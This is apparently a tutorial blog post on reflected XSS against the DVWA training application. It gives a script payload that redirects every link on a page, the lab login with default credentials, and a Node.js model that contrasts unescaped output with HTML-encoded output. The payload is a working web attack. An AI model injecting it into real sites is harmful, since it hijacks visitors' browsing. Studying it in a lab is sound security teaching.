XX Attacks: Reflected XSS Attack Hijacks the User's Browser
2022-07-01 08:06:00 [Cwillchris]
We first build a reflected XSS payload and deliver it through the vulnerable page. The attack could be run directly in DVWA as-is, but for demonstration purposes we set up a slightly more elaborate scenario: instead of a bare alert(), the payload rewrites every link on the page so that the victim's clicks are sent to a site of the attacker's choosing.
```html
<script>
// Run after the page has finished loading so every <a> is already in the DOM.
window.onload = function() {
    // Live HTMLCollection of every anchor element on the page.
    var link = document.getElementsByTagName("a");
    // Rewrite each anchor's target; the visible link text is left unchanged.
    for (var j = 0; j < link.length; j++) {
        link[j].href = "http://www.baidu.com";
    }
}
</script>
```
JavaScript code analysis: window.onload runs the anonymous function once the page has finished loading, so the anchors are already present in the DOM.
What the function does: document.getElementsByTagName("a") collects every <a> element on the page into link (an array-like HTMLCollection, not a true array), and the for loop rewrites the href of each element to the attacker-controlled URL. The page looks unchanged, but every link on it now sends the victim to the attacker's site; here http://www.baidu.com is used as a harmless stand-in for a malicious address.
Open the Chrome browser and test the effect on DVWA's reflected XSS page.
Log in at http://192.168.98.66/DVWA-master/login.php (username: admin, password: password) and set the DVWA security level to Low, where the page echoes the submitted input into the response without any encoding.
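As an added example (not code from the original post), the following Node.js script models the whole attack offline: the link-rewriting payload as a function, the attack URL built against DVWA's reflected XSS page, a stand-in for the Low-level server that echoes the parameter unescaped beside a hardened version that HTML-encodes it, and a check of which of the two lets the script tag through. Assumptions: the path vulnerabilities/xss_r/ and the name parameter come from DVWA's own source, not from the post; the host 192.168.98.66 is the one the post uses; the list of links is constructed test data standing in for document.getElementsByTagName("a").

```javascript
// Added example (not from the original post): modelling the reflected XSS
// link-hijack attack end to end in plain Node.js, no browser required.

// 1. The payload's logic: rewrite every anchor's href to the attacker's URL.
//    Written over any array-like of link objects so the same function runs on
//    a real HTMLCollection in a browser and on plain objects here.
function hijackLinks(links, target) {
  var count = 0;
  for (var j = 0; j < links.length; j++) {
    links[j].href = target;
    count++;
  }
  return count;
}

// 2. The payload as it is sent to the victim (same logic as the post's script).
var PAYLOAD =
  '<script>window.onload=function(){var link=document.getElementsByTagName("a");' +
  'for(var j=0;j<link.length;j++){link[j].href="http://www.baidu.com";}}</script>';

// DVWA's reflected XSS page and parameter (assumption: taken from DVWA's source,
// the post only gives the login URL). encodeURIComponent keeps the URL valid
// while the server decodes the payload back to the original characters.
var XSS_R = 'http://192.168.98.66/DVWA-master/vulnerabilities/xss_r/';
function buildAttackUrl(base, payload) {
  return base + '?name=' + encodeURIComponent(payload);
}

// 3. Stand-in for DVWA Low: the parameter is echoed as-is into the HTML.
function vulnerableRender(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Hardened stand-in: HTML-encode before inserting into the page (the same
// characters PHP's htmlspecialchars with ENT_QUOTES encodes).
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#039;');
}
function safeRender(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre>';
}

// 4. Does a live <script> tag end up in the rendered response?
function containsScript(html) {
  return /<script[\s>]/i.test(html);
}

// Walk the attack once: attacker builds the URL, server reads $_GET['name'],
// and the victim's page either executes the payload or shows it as text.
function demo() {
  var url = buildAttackUrl(XSS_R, PAYLOAD);
  var name = new URL(url).searchParams.get('name'); // what PHP sees in $_GET['name']
  // Constructed stand-in for document.getElementsByTagName("a") on the victim page.
  var links = [
    { href: 'http://192.168.98.66/DVWA-master/index.php' },
    { href: 'http://192.168.98.66/DVWA-master/logout.php' }
  ];
  return {
    vulnerable: containsScript(vulnerableRender(name)),
    hardened: containsScript(safeRender(name)),
    hijacked: hijackLinks(links, 'http://www.baidu.com'),
    links: links
  };
}

console.log(buildAttackUrl(XSS_R, PAYLOAD));
console.log(demo());
```

The decisive line is vulnerableRender: on Low, DVWA concatenates $_GET['name'] straight into the response, so the decoded payload becomes part of the page and runs in the victim's origin. With the encoding applied in safeRender the same input is rendered as literal text and the regex no longer finds a script tag, which is the behaviour DVWA's Impossible level gets from htmlspecialchars.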